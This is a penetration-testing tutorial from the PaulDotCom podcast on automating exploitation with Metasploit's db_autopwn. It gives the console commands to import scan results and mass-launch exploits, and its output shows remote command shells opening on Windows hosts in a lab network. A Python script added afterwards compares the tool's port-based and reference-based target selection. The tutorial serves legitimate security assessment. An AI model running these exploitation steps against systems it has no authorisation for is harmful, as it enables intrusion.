From PaulDotCom episode 124: Tech Segment: Automating Exploitation With Metasploit's db_autopwn

There is tremendous value in identifying vulnerabilities in your network, whether from the outside looking in, or the inside looking out. I like to automate this process as far as I can, then use manual methods to further verify my work. For example, let's say I want to quickly verify the results from an Nmap or Nessus scan and see if any of the Windows hosts are vulnerable to common Microsoft exploits. I can use Metasploit to do this, as it will test for the common remotely exploitable Windows vulnerabilities.

The first step is to set up Metasploit with a database module and create a database:

    msf > load db_sqlite3
    [*] Successfully loaded plugin: db_sqlite3
    msf > db_create mynetwork
    [*] Creating a new database instance...
    [*] Successfully connected to the database
    [*] File: mynetwork
    msf >

From here, I have many options. I can import Nmap results from a previous scan using the XML output (-oX):

    msf > db_import_nmap_xml mynetwork.xml

Using the db_nmap module, I can run Nmap directly from Metasploit and populate the database:

    msf > db_nmap -sS -T4 -O 192.168.1.0/24
    [*] exec: "/usr/local/bin/nmap" "-sS" "-T4" "-O" "192.168.1.0/24" "-oX" "/tmp/dbnmap.29736.0"
    NMAP:
    NMAP: Starting Nmap 4.76 ( http://nmap.org ) at 2008-09-25 09:05 EDT

I can now launch exploits against known targets, but only by open port (since we ran Nmap and only collected the open port information):

    msf > db_autopwn -p -e

The -p option selects exploits according to open port, and -e tells db_autopwn to actually launch the selected exploits rather than just list them. When I do this, I give Metasploit a lot of work to do:

    <snip>
    [*] Launching exploit/netware/smb/lsass_cifs (19/727) against 192.168.1.244:445...
    [*] Launching exploit/windows/http/badblue_passthru (20/727) against 192.168.1.52:80...
    [-] Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
    [*] Started bind handler
    [*] Trying target BadBlue 2.72b Universal...
    [*] Server may not be vulnerable.
    [*] Calling the vulnerable function...
    [*] Successfully removed /config/password.txt
    [*] Command shell session 1 opened (192.168.1.204:58664 -> 192.168.1.52:34657)
    [*] Launching exploit/windows/iis/ms01_023_printer (22/727) against 192.168.1.226:80...
    [*] Started bind handler
    <snip>

727 possible exploit vectors! That took a while. So, I decided to run Nessus against my network, then import the Nessus results:

    msf > db_import_nessus_nbe windows.nbe

Now I run db_autopwn and tell it to select modules based on the vulnerability reference:

    msf > db_autopwn -x -e

This produces much better results:

    msf > sessions -l

    Active sessions
    ===============

      Id  Description    Tunnel
      --  -----------    ------
      1   Command shell  192.168.1.204:60530 -> 192.168.1.52:37541
      2   Command shell  192.168.1.204:61047 -> 192.168.1.52:13917
      3   Command shell  192.168.1.204:61306 -> 192.168.1.52:6112
      4   Command shell  192.168.1.204:61350 -> 192.168.1.52:5646

    msf > sessions -i 2
    [*] Starting interaction with 2...

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>
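The difference between the two runs above comes down to how db_autopwn picks its (host, module) attempt list: -p pairs every module with every host that has the module's port open, while -x pairs a module only with hosts whose imported findings carry a reference the module claims. The following script is an added example, not code from the PaulDotCom segment or from Metasploit: it parses a constructed Nmap -oX fragment and constructed Nessus NBE lines, then builds both attempt lists from an assumed module catalog so the reduction in noise is visible. The module names are the ones printed in the segment's output, but their port and reference mappings, and the PLUGIN-* ids, are placeholders invented for illustration. In an assessment this is the kind of check that explains why the reference-driven run produced fewer failed attempts and less noise on the network.

```python
"""Added example, not part of the PaulDotCom segment: compare the two ways
db_autopwn picks its (host, module) attempt list, by open port (-p) versus by
vulnerability reference (-x), over constructed Nmap XML and Nessus NBE input.
The module->port/reference catalog and the plugin ids are assumptions made
for illustration, not Metasploit's or Nessus's real data."""
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed Nmap -oX fragment (three hosts, a mix of open and closed ports).
NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" version="4.76">
 <host><address addr="192.168.1.52" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="80"><state state="open"/></port>
  <port protocol="tcp" portid="445"><state state="open"/></port>
 </ports></host>
 <host><address addr="192.168.1.226" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="80"><state state="open"/></port>
  <port protocol="tcp" portid="139"><state state="closed"/></port>
 </ports></host>
 <host><address addr="192.168.1.244" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="445"><state state="open"/></port>
 </ports></host>
</nmaprun>"""

# Constructed NBE records: results|subnet|host|service (port/proto)|plugin|severity|text.
# The PLUGIN-* ids are placeholders, not real Nessus plugin numbers.
NBE = """\
results|192.168.1|192.168.1.52|http (80/tcp)|PLUGIN-A|Security Hole|web server flaw (constructed)
results|192.168.1|192.168.1.52|smb (445/tcp)|PLUGIN-B|Security Note|SMB service present
results|192.168.1|192.168.1.226|http (80/tcp)|PLUGIN-C|Security Hole|IIS ISAPI flaw (constructed)
results|192.168.1|192.168.1.244|smb (445/tcp)|PLUGIN-D|Security Note|CIFS service present"""

# Assumed module catalog: name -> (target ports, references the module claims).
# The names come from the segment's output; the mappings here are assumptions.
MODULES = {
    "exploit/windows/http/badblue_passthru": ({80}, {"PLUGIN-A"}),
    "exploit/windows/iis/ms01_023_printer": ({80}, {"PLUGIN-C"}),
    "exploit/netware/smb/lsass_cifs": ({445}, set()),  # no reference: -x never picks it
}


def parse_nmap_xml(text):
    """Map each host to its set of open TCP ports, the data db_import_nmap_xml keeps."""
    hosts = defaultdict(set)
    for host in ET.fromstring(text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        hosts[addr]  # register the host even if none of its ports are open
        for port in host.iter("port"):
            state = port.find("state")
            if state is not None and state.get("state") == "open":
                hosts[addr].add(int(port.get("portid")))
    return dict(hosts)


def parse_nbe(text):
    """Map each host to {plugin id: (port, severity)} from 'results' records only."""
    findings = defaultdict(dict)
    for line in text.splitlines():
        fields = line.split("|")
        if len(fields) < 6 or fields[0] != "results":
            continue  # NBE files also carry 'timestamps' records; skip anything else
        host, service, plugin, severity = fields[2], fields[3], fields[4], fields[5]
        match = re.search(r"\((\d+)/(?:tcp|udp)\)", service)
        port = int(match.group(1)) if match else None
        findings[host][plugin] = (port, severity)
    return dict(findings)


def candidates_by_port(open_ports, modules=MODULES):
    """-p strategy: any module whose target port is open on the host qualifies."""
    return [(host, name)
            for host, ports in sorted(open_ports.items())
            for name, (mports, _) in modules.items()
            if ports & mports]


def candidates_by_reference(findings, modules=MODULES):
    """-x strategy: only modules whose reference matches a reported finding qualify."""
    return [(host, name)
            for host, plugins in sorted(findings.items())
            for name, (_, refs) in modules.items()
            if refs & set(plugins)]


def compare(nmap_xml=NMAP_XML, nbe=NBE):
    """Return both attempt lists so the reduction from -p to -x can be inspected."""
    return {
        "by_port": candidates_by_port(parse_nmap_xml(nmap_xml)),
        "by_reference": candidates_by_reference(parse_nbe(nbe)),
    }


if __name__ == "__main__":
    for strategy, pairs in compare().items():
        print(f"{strategy}: {len(pairs)} attempt(s)")
        for host, name in pairs:
            print(f"  {host}  {name}")
```

With the constructed inputs, the port strategy schedules six attempts (every HTTP module against every host with port 80 open, and lsass_cifs against both SMB hosts), while the reference strategy schedules two, each backed by a finding the scanner actually reported. The same logic also explains a limitation of -x: a module with no scanner reference (lsass_cifs in this catalog) is never selected, so findings the scanner did not cover still need a manual pass.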